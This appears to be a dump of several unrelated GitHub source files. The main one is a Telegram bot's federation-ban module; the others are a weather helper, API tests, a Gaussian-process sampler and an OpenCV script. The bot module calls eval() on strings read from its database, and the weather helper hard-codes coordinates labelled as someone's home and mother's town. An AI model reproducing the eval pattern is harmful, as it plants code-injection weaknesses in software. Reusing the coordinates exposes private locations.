continue\n\n multi_fed_id.append(fed_id)\n multi_import_userid.append(str(import_userid))\n multi_import_firstname.append(import_firstname)\n multi_import_lastname.append(import_lastname)\n multi_import_username.append(import_username)\n multi_import_reason.append(import_reason)\n success += 1\n # t = ThreadWithReturnValue(target=sql.fban_user, args=(fed_id, str(import_userid), import_firstname, import_lastname, import_username, import_reason,))\n # t.start()\n sql.multi_fban_user(\n multi_fed_id,\n multi_import_userid,\n multi_import_firstname,\n multi_import_lastname,\n multi_import_username,\n multi_import_reason,\n )\n csvFile.close()\n os.remove(\"fban_{}.csv\".format(\n msg.reply_to_message.document.file_id))\n text = \"Files were imported successfully. {} people banned.\".format(\n success)\n if failed >= 1:\n text += \" {} Failed to import.\".format(failed)\n get_fedlog = sql.get_fed_log(fed_id)\n if get_fedlog:\n if eval(get_fedlog):\n teks = \"Fed *{}* has successfully imported data. {} banned.\".format(\n getfed[\"fname\"], success)\n if failed >= 1:\n teks += \" {} Failed to import.\".format(failed)\n context.bot.send_message(get_fedlog,\n teks,\n parse_mode=\"markdown\")\n else:\n send_message(update.effective_message,\n \"This file is not supported.\")\n return\n send_message(update.effective_message, text)\n\n\n@run_async\ndef del_fed_button(update, context):\n query = update.callback_query\n fed_id = query.data.split(\"_\")[1]\n\n if fed_id == \"cancel\":\n query.message.edit_text(\"Federation deletion cancelled\")\n return\n\n getfed = sql.get_fed_info(fed_id)\n if getfed:\n delete = sql.del_fed(fed_id)\n if delete:\n query.message.edit_text(\n \"You have removed your Federation! 
Now all the Groups that are connected with `{}` do not have a Federation.\" .format(\n                    getfed[\"fname\"]), parse_mode=\"markdown\", )\n\n\n@run_async\ndef fed_stat_user(update, context):\n    user = update.effective_user  # type: Optional[User]\n    msg = update.effective_message  # type: Optional[Message]\n    args = context.args\n\n    if args:\n        if args[0].isdigit():\n            user_id = args[0]\n        else:\n            user_id = extract_user(msg, args)\n    else:\n        user_id = extract_user(msg, args)\n\n    if user_id:\n        if len(args) == 2 and args[0].isdigit():\n            fed_id = args[1]\n            user_name, reason, fbantime = sql.get_user_fban(\n                fed_id, str(user_id))\n            if fbantime:\n                fbantime = time.strftime(\"%d/%m/%Y\", time.localtime(fbantime))\n            else:\n                fbantime = \"Unavailable\"\n            if user_name is False:\n                send_message(\n                    update.effective_message,\n                    \"Fed {} not found!\".format(fed_id),\n                    parse_mode=\"markdown\",\n                )\n                return\n            if user_name == \"\" or user_name is None:\n                user_name = \"He/she\"\n            if not reason:\n                send_message(\n                    update.effective_message,\n                    \"{} is not banned in this federation!\".format(user_name),\n                )\n            else:\n                teks = \"{} was banned in this federation because:\\n`{}`\\n*Banned at:* `{}`\".format(\n                    user_name, reason, fbantime)\n                send_message(update.effective_message,\n                             teks,\n                             parse_mode=\"markdown\")\n            return\n        user_name, fbanlist = sql.get_user_fbanlist(str(user_id))\n        if user_name == \"\":\n            try:\n                user_name = context.bot.get_chat(user_id).first_name\n            except BadRequest:\n                user_name = \"He/she\"\n        if user_name == \"\" or user_name is None:\n            user_name = \"He/she\"\n        if len(fbanlist) == 0:\n            send_message(\n                update.effective_message,\n                \"{} is not banned in any federation!\".format(user_name),\n            )\n            return\n        teks = \"{} has been banned in these federations:\\n\".format(user_name)\n        for x in fbanlist:\n            teks += \"- `{}`: {}\\n\".format(x[0], x[1][:20])\n        teks += \"\\nIf you want to find out more about the reasons for Fedban specifically, use /fbanstat \"\n        send_message(update.effective_message, teks, parse_mode=\"markdown\")\n\n    elif not msg.reply_to_message and not args:\n        user_id = msg.from_user.id\n        user_name, fbanlist = sql.get_user_fbanlist(user_id)\n        if user_name == \"\":\n            user_name = msg.from_user.first_name\n        if len(fbanlist) == 0:\n            send_message(\n                update.effective_message,\n                \"{} is not banned in any federation!\".format(user_name),\n            )\n        else:\n            teks = \"{} has been banned in these federations:\\n\".format(user_name)\n            for x in fbanlist:\n                teks += \"- `{}`: {}\\n\".format(x[0], x[1][:20])\n            teks += \"\\nIf you want to find out more about the reasons for Fedban specifically, use /fbanstat \"\n            send_message(update.effective_message, teks, parse_mode=\"markdown\")\n\n    else:\n        fed_id = args[0]\n        fedinfo = sql.get_fed_info(fed_id)\n        if not fedinfo:\n            send_message(update.effective_message,\n                         \"Fed {} not found!\".format(fed_id))\n            return\n        name, reason, fbantime = sql.get_user_fban(fed_id, msg.from_user.id)\n        if fbantime:\n            fbantime = time.strftime(\"%d/%m/%Y\", time.localtime(fbantime))\n        else:\n            fbantime = \"Unavailable\"\n        if not name:\n            name = msg.from_user.first_name\n        if not reason:\n            send_message(\n                update.effective_message,\n                \"{} is not banned in this federation\".format(name),\n            )\n            return\n        send_message(\n            update.effective_message,\n            \"{} was banned in this federation because:\\n`{}`\\n*Banned at:* `{}`\".\n            format(name, reason, fbantime),\n            parse_mode=\"markdown\",\n        )\n\n\n@run_async\ndef set_fed_log(update, context):\n    chat = update.effective_chat  # type: Optional[Chat]\n    user = update.effective_user  # type: 

Optional[User]\n args = context.args\n\n if chat.type == \"private\":\n send_message(\n update.effective_message,\n \"This command is specific to the group, not to the PM! \",\n )\n return\n\n if args:\n fedinfo = sql.get_fed_info(args[0])\n if not fedinfo:\n send_message(update.effective_message,\n \"This Federation does not exist!\")\n return\n isowner = is_user_fed_owner(args[0], user.id)\n if not isowner:\n send_message(\n update.effective_message,\n \"Only federation creator can set federation logs.\",\n )\n return\n setlog = sql.set_fed_log(args[0], chat.id)\n if setlog:\n send_message(\n update.effective_message,\n \"Federation log `{}` has been set to {}\".format(\n fedinfo[\"fname\"], chat.title),\n parse_mode=\"markdown\",\n )\n else:\n send_message(update.effective_message,\n \"You have not provided your federated ID!\")\n\n\n@run_async\ndef unset_fed_log(update, context):\n chat = update.effective_chat # type: Optional[Chat]\n user = update.effective_user # type: Optional[User]\n msg = update.effective_message # type: Optional[Message]\n args = context.args\n\n if chat.type == \"private\":\n send_message(\n update.effective_message,\n \"This command is specific to the group, not to the PM! \",\n )\n return\n\n if args:\n fedinfo = sql.get_fed_info(args[0])\n if not fedinfo:\n send_message(update.effective_message,\n \"This Federation does not exist!\")\n return\n isowner = is_user_fed_owner(args[0], user.id)\n if not isowner:\n send_message(\n update.effective_message,\n \"Only federation creator can set federation logs.\",\n )\n return\n setlog = sql.set_fed_log(args[0], None)\n if setlog:\n send_message(\n update.effective_message,\n \"Federation log `{}` has been revoked on {}\".format(\n fedinfo[\"fname\"], chat.title),\n parse_mode=\"markdown\",\n )\n else:\n send_message(update.effective_message,\n \"You have not provided your federated ID!\")\n\n\n@run_async\ndef subs_feds(update, context):\n chat = update.effective_chat # type: Optional[Chat]\n user = update.effective_user # type: Optional[User]\n msg = update.effective_message # type: Optional[Message]\n args = context.args\n\n if chat.type == \"private\":\n send_message(\n update.effective_message,\n \"This command is specific to the group, not to the PM! \",\n )\n return\n\n fed_id = sql.get_fed_id(chat.id)\n fedinfo = sql.get_fed_info(fed_id)\n\n if not fed_id:\n send_message(update.effective_message,\n \"This chat is not in any federation!\")\n return\n\n if is_user_fed_owner(fed_id, user.id) is False:\n send_message(update.effective_message, \"Only fed owner can do this!\")\n return\n\n if args:\n getfed = sql.search_fed_by_id(args[0])\n if getfed is False:\n send_message(update.effective_message,\n \"Please enter a valid federation id.\")\n return\n subfed = sql.subs_fed(args[0], fed_id)\n if subfed:\n send_message(\n update.effective_message,\n \"Federation `{}` has subscribe the federation `{}`. 
Every time there is a Fedban from that federation, this federation will also ban that user.\" .format(\n                    fedinfo[\"fname\"],\n                    getfed[\"fname\"]),\n                parse_mode=\"markdown\",\n            )\n            get_fedlog = sql.get_fed_log(args[0])\n            if get_fedlog:\n                if int(get_fedlog) != int(chat.id):\n                    context.bot.send_message(\n                        get_fedlog,\n                        \"Federation `{}` has subscribed to the federation `{}`\".\n                        format(fedinfo[\"fname\"], getfed[\"fname\"]),\n                        parse_mode=\"markdown\",\n                    )\n        else:\n            send_message(\n                update.effective_message,\n                \"Federation `{}` is already subscribed to the federation `{}`.\".\n                format(fedinfo[\"fname\"], getfed[\"fname\"]),\n                parse_mode=\"markdown\",\n            )\n    else:\n        send_message(update.effective_message,\n                     \"You have not provided your federated ID!\")\n\n\n@run_async\ndef unsubs_feds(update, context):\n    chat = update.effective_chat  # type: Optional[Chat]\n    user = update.effective_user  # type: Optional[User]\n    msg = update.effective_message  # type: Optional[Message]\n    args = context.args\n\n    if chat.type == \"private\":\n        send_message(\n            update.effective_message,\n            \"This command is specific to the group, not to the PM! \",\n        )\n        return\n\n    fed_id = sql.get_fed_id(chat.id)\n    fedinfo = sql.get_fed_info(fed_id)\n\n    if not fed_id:\n        send_message(update.effective_message,\n                     \"This chat is not in any federation!\")\n        return\n\n    if is_user_fed_owner(fed_id, user.id) is False:\n        send_message(update.effective_message, \"Only fed owner can do this!\")\n        return\n\n    if args:\n        getfed = sql.search_fed_by_id(args[0])\n        if getfed is False:\n            send_message(update.effective_message,\n                         \"Please enter a valid federation id.\")\n            return\n        subfed = sql.unsubs_fed(args[0], fed_id)\n        if subfed:\n            send_message(\n                update.effective_message,\n                \"Federation `{}` has unsubscribed from fed `{}`.\".format(\n                    fedinfo[\"fname\"], getfed[\"fname\"]),\n                parse_mode=\"markdown\",\n            )\n            get_fedlog = sql.get_fed_log(args[0])\n            if get_fedlog:\n                if int(get_fedlog) != int(chat.id):\n                    context.bot.send_message(\n                        get_fedlog,\n                        \"Federation `{}` has unsubscribed from fed `{}`.\".format(\n                            fedinfo[\"fname\"], getfed[\"fname\"]),\n                        parse_mode=\"markdown\",\n                    )\n        else:\n            send_message(\n                update.effective_message,\n                \"Federation `{}` is not subscribed to `{}`.\".format(\n                    fedinfo[\"fname\"], getfed[\"fname\"]),\n                parse_mode=\"markdown\",\n            )\n    else:\n        send_message(update.effective_message,\n                     \"You have not provided your federated ID!\")\n\n\n@run_async\ndef get_myfedsubs(update, context):\n    chat = update.effective_chat  # type: Optional[Chat]\n    user = update.effective_user  # type: Optional[User]\n    msg = update.effective_message  # type: Optional[Message]\n    args = context.args\n\n    if chat.type == \"private\":\n        send_message(\n            update.effective_message,\n            \"This command is specific to the group, not to the PM! \",\n        )\n        return\n\n    fed_id = sql.get_fed_id(chat.id)\n    fedinfo = sql.get_fed_info(fed_id)\n\n    if not fed_id:\n        send_message(update.effective_message,\n                     \"This chat is not in any federation!\")\n        return\n\n    if is_user_fed_owner(fed_id, user.id) is False:\n        send_message(update.effective_message, \"Only fed owner can do this!\")\n        return\n\n    getmy = sql.get_mysubs(fed_id)\n\n    if getmy is None:\n        send_message(\n            update.effective_message,\n            \"Federation `{}` is not subscribed to any federation.\".format(\n                fedinfo[\"fname\"]),\n            parse_mode=\"markdown\",\n        )\n        return\n    listfed = \"Federation `{}` is subscribed to these federations:\\n\".format(\n        fedinfo[\"fname\"])\n    for x in getmy:\n        listfed += \"- `{}`\\n\".format(x)\n    listfed += (\n        \"\\nTo get fed info `/fedinfo `. 

To unsubscribe `/unsubfed `.\"\n    )\n    send_message(update.effective_message, listfed, parse_mode=\"markdown\")\n\n\n@run_async\ndef get_myfeds_list(update, context):\n    chat = update.effective_chat  # type: Optional[Chat]\n    user = update.effective_user  # type: Optional[User]\n    msg = update.effective_message  # type: Optional[Message]\n    args = context.args\n\n    fedowner = sql.get_user_owner_fed_full(user.id)\n    if fedowner:\n        text = \"*You are the owner of these feds:*\\n\"\n        for f in fedowner:\n            text += \"- `{}`: *{}*\\n\".format(f[\"fed_id\"], f[\"fed\"][\"fname\"])\n    else:\n        text = \"*You don't have any feds!*\"\n    send_message(update.effective_message, text, parse_mode=\"markdown\")\n\n\ndef is_user_fed_admin(fed_id, user_id):\n    fed_admins = sql.all_fed_users(fed_id)\n    if fed_admins is False:\n        return False\n    if int(user_id) in fed_admins or int(user_id) == OWNER_ID:\n        return True\n    return False\n\n\ndef is_user_fed_owner(fed_id, user_id):\n    getsql = sql.get_fed_info(fed_id)\n    if getsql is False:\n        return False\n    getfedowner = eval(getsql[\"fusers\"])\n    if getfedowner is None or getfedowner is False:\n        return False\n    getfedowner = getfedowner[\"owner\"]\n    if str(user_id) == getfedowner or int(user_id) == OWNER_ID:\n        return True\n    return False\n\n\n@run_async\ndef welcome_fed(update, context):\n    chat = update.effective_chat  # type: Optional[Chat]\n    user = update.effective_user  # type: Optional[User]\n\n    fed_id = sql.get_fed_id(chat.id)\n    fban, fbanreason, fbantime = sql.get_fban_user(fed_id, user.id)\n    if fban:\n        update.effective_message.reply_text(\n            \"This user is banned in the current federation! I will remove them.\")\n        context.bot.kick_chat_member(chat.id, user.id)\n        return True\n    return False\n\n\ndef __stats__():\n    all_fbanned = sql.get_all_fban_users_global()\n    all_feds = sql.get_all_feds_users_global()\n    return \"× {} users banned, in {} federations\".format(\n        len(all_fbanned), len(all_feds))\n\n\ndef __user_info__(user_id, chat_id):\n    fed_id = sql.get_fed_id(chat_id)\n    if fed_id:\n        fban, fbanreason, fbantime = sql.get_fban_user(fed_id, user_id)\n        info = sql.get_fed_info(fed_id)\n        infoname = info[\"fname\"]\n\n        if int(info[\"owner\"]) == user_id:\n            text = (\n                \"This user is the owner of the current Federation: {}.\".\n                format(infoname))\n        elif is_user_fed_admin(fed_id, user_id):\n            text = (\n                \"This user is an admin of the current Federation: {}.\".\n                format(infoname))\n\n        elif fban:\n            text = \"Banned in current Fed: Yes\"\n            text += \"\\nReason: {}\".format(fbanreason)\n        else:\n            text = \"Banned in current Fed: No\"\n    else:\n        text = \"\"\n    return text\n\n\n# Temporary data\ndef put_chat(chat_id, value, chat_data):\n    # print(chat_data)\n    if value is False:\n        status = False\n    else:\n        status = True\n    chat_data[chat_id] = {\"federation\": {\"status\": status, \"value\": value}}\n\n\ndef get_chat(chat_id, chat_data):\n    # print(chat_data)\n    try:\n        value = chat_data[chat_id][\"federation\"]\n        return value\n    except KeyError:\n        return {\"status\": False, \"value\": False}\n\n\n__mod_name__ = \"Federation 🔗\"\n\n__help__ = \"\"\"\nHere is the help for the Federation 🔗 module:\n\nAh, group management. Everything is fun, until a spammer enters your group and you have to ban them. Then you need to ban more, and more, and it hurts.\nBut then you have many groups, and you don't want this spammer to be in any of your groups - how do you deal with that? Do you have to manually ban them in all your groups?\nNo longer! 

With Federations, a ban in one chat carries over to all other chats.\nYou can even designate federation admins, so your trusted admins can ban across all the chats you want to protect.\n\nCommands Available:\n - /newfed : Create a new Federation with the name given. Users are only allowed to have one Federation. This method can also be used to rename the Federation. (max. 64 characters)\n - /delfed: Delete your Federation, and any information related to it. Will not unban blocked users.\n - /fedinfo : Information about the specified Federation.\n - /joinfed : Join the current chat to the Federation. Only chat owners can do this. Every chat can only be in one Federation.\n - /leavefed : Leave the given Federation. Only chat owners can do this.\n - /fpromote : Promote a user to fed admin. Fed owner only.\n - /fdemote : Demote a user from fed admin back to a normal user. Fed owner only.\n - /fban : Ban a user from all federations this chat is in, and that the executor has control over.\n - /unfban : Unban a user from all federations this chat is in, and that the executor has control over.\n - /setfrules: Set the Federation rules.\n - /frules: See the Federation rules.\n - /chatfed: See the Federation in the current chat.\n - /fedadmins: Show the Federation admins.\n - /fbanlist: Displays all users who are currently banned from the Federation.\n - /fednotif : Toggle PM notifications for every user who is fbanned / unfbanned.\n - /fedchats: Get all the chats that are connected to the Federation.\n\"\"\"\n\nNEW_FED_HANDLER = CommandHandler(\"newfed\", new_fed)\nDEL_FED_HANDLER = CommandHandler(\"delfed\", del_fed, pass_args=True)\nJOIN_FED_HANDLER = CommandHandler(\"joinfed\", join_fed, pass_args=True)\nLEAVE_FED_HANDLER = CommandHandler(\"leavefed\", leave_fed, pass_args=True)\nPROMOTE_FED_HANDLER = CommandHandler(\"fpromote\", user_join_fed, pass_args=True)\nDEMOTE_FED_HANDLER = CommandHandler(\"fdemote\", user_demote_fed, pass_args=True)\nINFO_FED_HANDLER = CommandHandler(\"fedinfo\", fed_info, pass_args=True)\nBAN_FED_HANDLER = CommandHandler([\"fban\", \"fedban\"], fed_ban, pass_args=True)\nUN_BAN_FED_HANDLER = CommandHandler(\"unfban\", unfban, pass_args=True)\nFED_BROADCAST_HANDLER = CommandHandler(\"fbroadcast\",\n                                       fed_broadcast,\n                                       pass_args=True)\nFED_SET_RULES_HANDLER = CommandHandler(\"setfrules\", set_frules, pass_args=True)\nFED_GET_RULES_HANDLER = CommandHandler(\"frules\", get_frules, pass_args=True)\nFED_CHAT_HANDLER = CommandHandler(\"chatfed\", fed_chat, pass_args=True)\nFED_ADMIN_HANDLER = CommandHandler(\"fedadmins\", fed_admin, pass_args=True)\nFED_USERBAN_HANDLER = CommandHandler(\"fbanlist\",\n                                     fed_ban_list,\n                                     pass_args=True,\n                                     pass_chat_data=True)\nFED_NOTIF_HANDLER = CommandHandler(\"fednotif\", fed_notif, pass_args=True)\nFED_CHATLIST_HANDLER = CommandHandler(\"fedchats\", fed_chats, pass_args=True)\nFED_IMPORTBAN_HANDLER = CommandHandler(\"importfbans\",\n                                       fed_import_bans,\n                                       pass_chat_data=True)\nFEDSTAT_USER = CommandHandler([\"fedstat\", \"fbanstat\"],\n                              fed_stat_user,\n                              pass_args=True)\nSET_FED_LOG = CommandHandler(\"setfedlog\", set_fed_log, pass_args=True)\nUNSET_FED_LOG = CommandHandler(\"unsetfedlog\", unset_fed_log, pass_args=True)\nSUBS_FED = CommandHandler(\"subfed\", subs_feds, pass_args=True)\nUNSUBS_FED = CommandHandler(\"unsubfed\", unsubs_feds, pass_args=True)\nMY_SUB_FED = CommandHandler(\"fedsubs\", get_myfedsubs, pass_args=True)\nMY_FEDS_LIST = CommandHandler(\"myfeds\", 

get_myfeds_list)\n\nDELETEBTN_FED_HANDLER = CallbackQueryHandler(del_fed_button, pattern=r\"rmfed_\")\n\ndispatcher.add_handler(NEW_FED_HANDLER)\ndispatcher.add_handler(DEL_FED_HANDLER)\ndispatcher.add_handler(JOIN_FED_HANDLER)\ndispatcher.add_handler(LEAVE_FED_HANDLER)\ndispatcher.add_handler(PROMOTE_FED_HANDLER)\ndispatcher.add_handler(DEMOTE_FED_HANDLER)\ndispatcher.add_handler(INFO_FED_HANDLER)\ndispatcher.add_handler(BAN_FED_HANDLER)\ndispatcher.add_handler(UN_BAN_FED_HANDLER)\ndispatcher.add_handler(FED_BROADCAST_HANDLER)\ndispatcher.add_handler(FED_SET_RULES_HANDLER)\ndispatcher.add_handler(FED_GET_RULES_HANDLER)\ndispatcher.add_handler(FED_CHAT_HANDLER)\ndispatcher.add_handler(FED_ADMIN_HANDLER)\ndispatcher.add_handler(FED_USERBAN_HANDLER)\ndispatcher.add_handler(FED_NOTIF_HANDLER)\ndispatcher.add_handler(FED_CHATLIST_HANDLER)\ndispatcher.add_handler(FED_IMPORTBAN_HANDLER)\ndispatcher.add_handler(FEDSTAT_USER)\ndispatcher.add_handler(SET_FED_LOG)\ndispatcher.add_handler(UNSET_FED_LOG)\ndispatcher.add_handler(SUBS_FED)\ndispatcher.add_handler(UNSUBS_FED)\ndispatcher.add_handler(MY_SUB_FED)\ndispatcher.add_handler(MY_FEDS_LIST)\n\ndispatcher.add_handler(DELETEBTN_FED_HANDLER)\n","repo_name":"gogeta0sama/missBot","sub_path":"julia/modules/feds.py","file_name":"feds.py","file_ext":"py","file_size_in_byte":86793,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"21120182518","text":"def get_location(place='home'):\n    locations = {\n        'home': {'lat': 34.718553, 'lon': -86.778150, 'label': 'Madison, AL'},\n        'mom': {'lat': 34.807048, 'lon': -92.282116, 'label': 'North Little Rock, AR'},\n        'test': {'lat': 35.745894, 'lon': -89.531717, 'label': 'Some random place with interesting weather'},\n    }\n\n    try:\n        lat = locations[place]['lat']\n        lon = locations[place]['lon']\n        label = locations[place]['label']\n    except KeyError:\n        print('*** Location not recognized. ***')\n        exit()\n\n    return lat, lon, label\n","repo_name":"bakerbug/weather-bot","sub_path":"location_data.py","file_name":"location_data.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"10278226232","text":"import pytest\nimport responses\nimport requests\nimport urllib\nimport json\nimport re\n\nfrom recommendation.api import candidate_finders\n\nPAGEVIEW_RESPONSE = {\n    'items': [\n        {\n            'access': 'all-access',\n            'month': '08',\n            'day': '16',\n            'year': '2016',\n            'project': 'en.wikipedia',\n            'articles': [\n                {'article': 'Sample_A', 'rank': 1, 'views': 20},\n                {'article': 'Sample_B', 'rank': 2, 'views': 19},\n                {'article': 'Sample_C', 'rank': 3, 'views': 18},\n                {'article': 'Sample_D', 'rank': 4, 'views': 17},\n                {'article': 'Sample_E', 'rank': 5, 'views': 16},\n                {'article': 'Sample_F', 'rank': 6, 'views': 15},\n                {'article': 'Sample_G', 'rank': 7, 'views': 14},\n                {'article': 'Sample_H', 'rank': 8, 'views': 13},\n                {'article': 'Sample_I', 'rank': 9, 'views': 12},\n                {'article': 'Sample_J', 'rank': 10, 'views': 11},\n                {'article': 'Sample_K', 'rank': 11, 'views': 10},\n                {'article': 'Sample_L', 'rank': 12, 'views': 9}\n            ]\n        }\n    ]\n}\n\nBAD_PAGEVIEW_RESPONSE = {\n    'detail': ('The date(s) you used are valid, but we either do not have data for those date(s), or the project you '\n               'asked for is not loaded yet. 

Please check https://wikimedia.org/api/rest_v1/?doc for more '\n 'information.'),\n 'uri': '/analytics.wikimedia.org/v1/pageviews/top/qqq.wikipedia/all-access/2016/08/16',\n 'type': 'https://restbase.org/errors/not_found',\n 'method': 'get',\n 'title': 'Not found.'\n}\n\nMORELIKE_RESPONSE = {\n 'batchcomplete': '',\n 'query': {\n 'searchinfo': {'totalhits': 100},\n 'search': [\n {'ns': 0, 'wordcount': 1001, 'title': 'A'},\n {'ns': 0, 'wordcount': 1002, 'title': 'B'},\n {'ns': 0, 'wordcount': 1003, 'title': 'C'},\n {'ns': 0, 'wordcount': 1004, 'title': 'D'},\n {'ns': 0, 'wordcount': 1005, 'title': 'E'},\n {'ns': 0, 'wordcount': 1006, 'title': 'F'},\n {'ns': 0, 'wordcount': 1007, 'title': 'G'},\n {'ns': 0, 'wordcount': 1008, 'title': 'H'},\n {'ns': 0, 'wordcount': 1009, 'title': 'I'},\n {'ns': 0, 'wordcount': 1010, 'title': 'J'},\n {'ns': 0, 'wordcount': 1011, 'title': 'K'},\n {'ns': 0, 'wordcount': 1012, 'title': 'L'}\n ]\n },\n 'continue': {'sroffset': 12, 'continue': '-||'}\n}\n\nEMPTY_WIKI_RESPONSE = {\n 'batchcomplete': '',\n 'query': {\n 'searchinfo': {'totalhits': 0},\n 'search': []\n }\n}\n\n\ndef get_good_response(finder):\n finder_type = type(finder)\n if finder_type is candidate_finders.PageviewCandidateFinder:\n return PAGEVIEW_RESPONSE\n if finder_type is candidate_finders.MorelikeCandidateFinder:\n return MORELIKE_RESPONSE\n return {}\n\n\ndef get_bad_response(finder):\n finder_type = type(finder)\n if finder_type is candidate_finders.PageviewCandidateFinder:\n return BAD_PAGEVIEW_RESPONSE\n return {}\n\n\ndef add_response(body, status):\n responses.add(responses.GET, re.compile(r'http://localhost.'), body=body, status=status,\n content_type='application/json')\n\n\n@pytest.fixture(params=[\n candidate_finders.PageviewCandidateFinder,\n candidate_finders.MorelikeCandidateFinder\n])\ndef finder(request):\n return request.param()\n\n\n@pytest.mark.parametrize('count', [\n 0,\n 10\n])\ndef test_finder_returns_correct_amount(finder, count):\n add_response(json.dumps(get_good_response(finder)), 200)\n result = finder.get_candidates('en', None, count)\n assert count == len(result)\n\n\ndef test_inheritance(finder):\n assert isinstance(finder, candidate_finders.CandidateFinder)\n\n\ndef test_invalid_language_returns_empty_list(finder):\n add_response(body=json.dumps(get_bad_response(finder)), status=404)\n result = finder.get_candidates('qqq', None, 1)\n assert [] == result\n\n\n@pytest.mark.parametrize('body,status', [\n ('', 404),\n ('bad json', 200),\n (requests.HTTPError('mocked exception'), 0)\n])\ndef test_finder_returns_empty_list_when_requests_breaks(finder, body, status):\n add_response(body=body, status=status)\n assert [] == finder.get_candidates('en', None, 10)\n\n\ndef test_finder_calls_go_through_responses(finder):\n if type(finder) is candidate_finders.MorelikeCandidateFinder:\n # the number of calls is determined by other factors\n # that are tested more thoroughly elsewhere\n return\n add_response(body=json.dumps(get_good_response(finder)), status=200)\n finder.get_candidates('en', None, 10)\n assert 1 == len(responses.calls)\n url = responses.calls[0].request.url\n assert 'http://localhost' == url[:16]\n\n\n@pytest.mark.parametrize('seed,query,expected_calls,seed_response,morelike_response', [\n ('A', 'A', 2, MORELIKE_RESPONSE, MORELIKE_RESPONSE),\n ('B', 'A', 2, MORELIKE_RESPONSE, MORELIKE_RESPONSE),\n ('A', 'A', 1, EMPTY_WIKI_RESPONSE, MORELIKE_RESPONSE),\n ('Z', 'A', 3, MORELIKE_RESPONSE, EMPTY_WIKI_RESPONSE)\n])\ndef test_wiki_search_paths(seed, query, 
expected_calls, seed_response, morelike_response):\n \"\"\"\n This function is a mess, but it tries to build and execute the various paths through\n the morelike candidate finder\n\n :param seed: the user-supplied seed when performing a search\n :param query: after performing the first wiki_search, the top result is used for the subsequent searches\n this param is used to mock that value when building the url\n :param expected_calls: how many calls are expected to go through `responses`\n :param seed_response: the response to the initial seed_list query\n :param morelike_response: the response to the morelike query\n \"\"\"\n finder = candidate_finders.MorelikeCandidateFinder()\n search_pattern = dict(\n seed=(seed, 1, False, seed_response),\n morelike=(query, 10, True, morelike_response),\n fallback=(query, 10, False, MORELIKE_RESPONSE)\n )\n for query, count, morelike, response in search_pattern.values():\n url, params = candidate_finders.build_wiki_search('en', query, count, morelike)\n url += '?' + urllib.parse.urlencode(params)\n responses.add(responses.GET, url, json=response, status=200, match_querystring=True)\n finder.get_candidates('en', seed, 10)\n assert expected_calls == len(responses.calls)\n","repo_name":"wikimedia-research/translation-recs-app","sub_path":"recommendation/api/test/test_candidate_finders.py","file_name":"test_candidate_finders.py","file_ext":"py","file_size_in_byte":6473,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"96"} +{"seq_id":"3473231111","text":"import numpy as np\nfrom advectionGP.sensors import FixedSensorModel \nfrom advectionGP.kernels import EQ \nfrom advectionGP.wind import WindSimple\nfrom advectionGP.constraints import NonNegConstraint\nfrom advectionGP.kernels import meshgridndim\nfrom advectionGP.models.mesh_adr2d_model import AdjointAdvectionDiffusionReaction2DModel as PDEModel\n\nclass ModelSample():\n def __init__(self,ls=1,non_neg=False,N_feat=300):\n \"\"\"\n Generates a sample from our model (with different hyperparameters). 
Option available to restrict it to non-negative samples\n        \"\"\"\n        tlocL = np.linspace(1,9,10) # lower time\n        xloc=np.linspace(1,9,5) # x locations\n        yloc=np.linspace(1,9,5) # y locations\n        sensN = len(xloc)*len(yloc) # total number of sensors \n        obsN = len(tlocL) # total time points at which an observation is taken\n        X= np.zeros((obsN*sensN,4)) # obsN*sensN is total observations over all sensors and all times\n        # Build sensor locations\n        X[:,0] = np.asarray(np.meshgrid(tlocL,xloc,yloc)).reshape(3,sensN*obsN)[0] #lower time\n        X[:,2] = np.asarray(np.meshgrid(tlocL,xloc,yloc)).reshape(3,sensN*obsN)[1] # x location\n        X[:,3] = np.asarray(np.meshgrid(tlocL,xloc,yloc)).reshape(3,sensN*obsN)[2] # ylocation\n        X[:,1] = X[:,0]+0.1 # upper time\n\n        sensors = FixedSensorModel(X,0.1) # establish sensor model arguments are sensor locations and spatial averaging\n\n        k_0 = 0.01 #Diffusion\n        R=0\n        noiseSD = 0.05 #Observation noise\n        \n        boundary = ([0,0,0],[10,10,10])# corners of the grid - in units of space\n        k = EQ(ls, 2.0) # generate EQ kernel arguments are lengthscale and variance\n        res = [500,150,150] # grid size for time, x and y\n        Nsamps = 1\n        u1 = 0.4\n        u2 = 0.4\n        windmodel=WindSimple(u1,u2) # establish fixed wind model\n        m = PDEModel(resolution=res,boundary=boundary,N_feat=N_feat,noiseSD=noiseSD,kernel=k,sensormodel=sensors,windmodel=windmodel,k_0=k_0,R=0)\n        \n        if non_neg:\n            m.computeModelRegressors()\n            Xnonneg = meshgridndim(m.boundary,10,True)\n            nnc = NonNegConstraint(m,np.array([[]]),Xnonneg,thinning=5,burnin=100,jitter=0.02,verbose=True,meanZ = np.zeros(N_feat),covZ = np.eye(N_feat),startpointnormalised=True)\n            Zs_nonneg = nnc.sample(Nsamps)\n            z = Zs_nonneg[0,:]\n        else:\n            z = np.random.randn(N_feat)\n        ####\n        source=(m.computeSourceFromPhi(z))# Compute source\n        conc=m.computeResponse(source) # Compute concentration - runs advection diffusion forward model\n        Y= m.computeObservations(addNoise=True) # Compute observations with noise uses m.sensormodel for observation locations\n        \n        self.X = X\n        self.Y = Y\n        self.source = source\n        self.conc = conc\n        self.boundary = boundary\n        self.m = m\n","repo_name":"SheffieldML/advectionGPdatasets","sub_path":"advectionGPdatasets/modelsample.py","file_name":"modelsample.py","file_ext":"py","file_size_in_byte":2911,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"18813902894","text":"import cv2\r\n\r\nimage_path = \"G:\\Save Files\\Python Save Files\\CV Drawing Techniques\\images\"\r\n\r\nimage = cv2.imread(image_path + '\\Balls Graphic.jpg', 0)\r\n\r\nedged_image = cv2.Canny(image, 30, 250)\r\n\r\ncontours, hierarchy = cv2.findContours(edged_image, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)\r\n\r\ncontours_drawn = cv2.drawContours(image, contours, -1, (0, 0, 0), 5)\r\n\r\ncv2.imshow('Contours Drawn on Image', contours_drawn)\r\n\r\ncv2.waitKey(0)\r\ncv2.destroyAllWindows()","repo_name":"WaqasAkbarEngr/Computer-Vision-Drawing-Techniques","sub_path":"CV Drawing 